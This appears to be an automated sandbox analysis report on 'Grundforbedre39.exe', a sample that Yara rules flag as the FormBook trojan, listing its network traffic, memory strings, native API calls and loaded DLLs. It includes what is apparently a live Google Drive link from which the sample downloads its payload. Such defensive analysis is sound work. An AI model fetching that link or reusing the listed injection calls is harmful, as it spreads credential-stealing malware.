Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:54:15 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:54:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:54:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:54:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 39 73 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /m9so/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:55:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: Grundforbedre39.exe, 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Grundforbedre39.exe, 00000000.00000000.792517395.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Grundforbedre39.exe, 00000004.00000000.1037768480.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000626000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/U
Source: Grundforbedre39.exe, 00000004.00000002.1277691760.00000000348B0000.00000004.00001000.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.0000000005231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0
Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162332275.000000000523F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download
Source: Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=downloade.
Source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: Grundforbedre39.exe, 00000004.00000003.1116677248.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000003.1162616278.000000000525A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757

Source: unknown	HTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49758 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Grundforbedre39.exe

Code function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052B8

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355534E0 NtCreateMutant,LdrInitializeThunk,	4_2_355534E0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_35552D10
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_35552B90
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35554570 NtSuspendThread,	4_2_35554570
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35554260 NtSetContextThread,	4_2_35554260
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552D50 NtWriteVirtualMemory,	4_2_35552D50
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552DC0 NtAdjustPrivilegesToken,	4_2_35552DC0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552DA0 NtReadVirtualMemory,	4_2_35552DA0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552C50 NtUnmapViewOfSection,	4_2_35552C50
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552C10 NtOpenProcess,	4_2_35552C10
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35553C30 NtOpenProcessToken,	4_2_35553C30
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552C30 NtMapViewOfSection,	4_2_35552C30
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552C20 NtSetInformationFile,	4_2_35552C20
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552CD0 NtEnumerateKey,	4_2_35552CD0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552CF0 NtDelayExecution,	4_2_35552CF0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35553C90 NtOpenThread,	4_2_35553C90
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552F00 NtCreateFile,	4_2_35552F00
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552F30 NtOpenDirectoryObject,	4_2_35552F30
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552FB0 NtSetValueKey,	4_2_35552FB0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552E50 NtCreateSection,	4_2_35552E50
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552E00 NtQueueApcThread,	4_2_35552E00
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552ED0 NtResumeThread,	4_2_35552ED0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35552EC0 NtQuerySection,	4_2_35552EC0

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Grundforbedre39.exe

Code function: 0_2_0040326A EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_0040326A

Detected potential crypto function

Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 0_2_004066E2	0_2_004066E2
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 0_2_00404AF5	0_2_00404AF5
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355EA526	4_2_355EA526
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355DF5C9	4_2_355DF5C9
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355D75C6	4_2_355D75C6
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35520445	4_2_35520445
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355D6757	4_2_355D6757
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3552A760	4_2_3552A760
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355DE709	4_2_355DE709
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3551170C	4_2_3551170C
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355CD646	4_2_355CD646
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35544670	4_2_35544670
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3553C600	4_2_3553C600
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355DF6F6	4_2_355DF6F6
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3551C6E0	4_2_3551C6E0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355936EC	4_2_355936EC
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35520680	4_2_35520680
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3550F113	4_2_3550F113
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355E010E	4_2_355E010E
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355BD130	4_2_355BD130
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355251C0	4_2_355251C0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3553B1E0	4_2_3553B1E0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355CE076	4_2_355CE076
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3552B0D0	4_2_3552B0D0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355D70F1	4_2_355D70F1
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355100A0	4_2_355100A0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3552E310	4_2_3552E310
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355DF330	4_2_355DF330
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355CC3FC	4_2_355CC3FC
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35511380	4_2_35511380
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3553D210	4_2_3553D210
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3550D2EC	4_2_3550D2EC
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355D7D4C	4_2_355D7D4C
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35520D69	4_2_35520D69
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355E1D2E	4_2_355E1D2E
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355DFD27	4_2_355DFD27
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35529DD0	4_2_35529DD0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35532DB0	4_2_35532DB0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355CEC4C	4_2_355CEC4C
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355D6C69	4_2_355D6C69
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355DEC60	4_2_355DEC60
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35510C12	4_2_35510C12
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_3552AC20	4_2_3552AC20
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35538CDF	4_2_35538CDF
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35528CE0	4_2_35528CE0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355EACEB	4_2_355EACEB
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355B9C98	4_2_355B9C98
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355DFF63	4_2_355DFF63
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355D1FC6	4_2_355D1FC6
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35526FE0	4_2_35526FE0
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355DEFBF	4_2_355DEFBF
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35540E50	4_2_35540E50
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_355D9ED2	4_2_355D9ED2
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 4_2_35512EE8	4_2_35512EE8
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D43AE8	9_2_04D43AE8
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D625D7	9_2_04D625D7
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D4589E	9_2_04D4589E
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D458A7	9_2_04D458A7
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D4C075	9_2_04D4C075
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D4C077	9_2_04D4C077
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D45AC7	9_2_04D45AC7
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D43B46	9_2_04D43B46
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D43B47	9_2_04D43B47

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: String function: 3550B910 appears 79 times
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: String function: 35567BE4 appears 60 times
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: String function: 3559EF10 appears 59 times
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: String function: 3558E692 appears 65 times

PE / OLE file has an invalid certificate

Source: Grundforbedre39.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenamenetiougc.exej% vs Grundforbedre39.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: textshaping.dll	Jump to behavior
